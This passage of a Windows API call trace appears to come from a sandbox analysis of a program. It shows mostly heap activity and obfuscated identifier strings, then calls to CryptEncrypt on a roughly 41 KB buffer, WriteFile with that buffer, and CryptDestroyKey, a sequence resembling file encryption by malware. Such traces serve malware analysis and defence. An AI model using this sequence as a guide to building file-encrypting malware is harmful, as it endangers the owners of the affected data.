[0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0107.010] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e640 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f10 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a742c8 | out: hHeap=0x2af0000) returned 1 [0107.010] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0107.010] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.011] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a743e8 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e68 [0107.011] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719f8 [0107.011] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0107.012] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e68 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0107.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0107.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.012] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a743e8 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.012] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7160 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0107.013] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0107.013] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d18 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e9c0 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.013] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dc0 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ef8 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.014] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a984a8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d60 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719d8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e38 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.015] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a08 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.015] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9df0 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b38 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f28 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9da8 | out: hHeap=0x2af0000) returned 1 [0107.016] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0107.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.016] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9e38, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.016] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xa120, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xa128) returned 1 [0107.053] CharLowerBuffW (in: lpsz="byte[41256]", cchLength=0xb | out: lpsz="byte[41256]") returned 0xb [0107.055] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.055] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.055] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0107.055] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ec8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0107.055] CryptEncrypt (in: hKey=0x9a4580, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a984a8*, pdwDataLen=0x8cef60*=0xa120, dwBufLen=0xa128 | out: pbData=0x2a984a8*, pdwDataLen=0x8cef60*=0xa128) returned 1 [0107.056] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.056] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.056] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.056] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.056] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.057] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.061] WriteFile (in: hFile=0x458, lpBuffer=0x2a7a130*, nNumberOfBytesToWrite=0xa128, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a7a130*, lpNumberOfBytesWritten=0x8cf5e4*=0xa128, lpOverlapped=0x0) returned 1 [0107.063] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0107.063] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.063] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0107.063] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aa9a60, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0107.063] CryptDestroyKey (hKey=0x9a4580) returned 1 [0107.063] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.063] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.063] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.063] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0107.063] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0107.064] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0107.064] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0107.064] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.064] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0107.064] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0107.064] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0107.064] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0107.064] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0107.064] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0107.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0107.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, 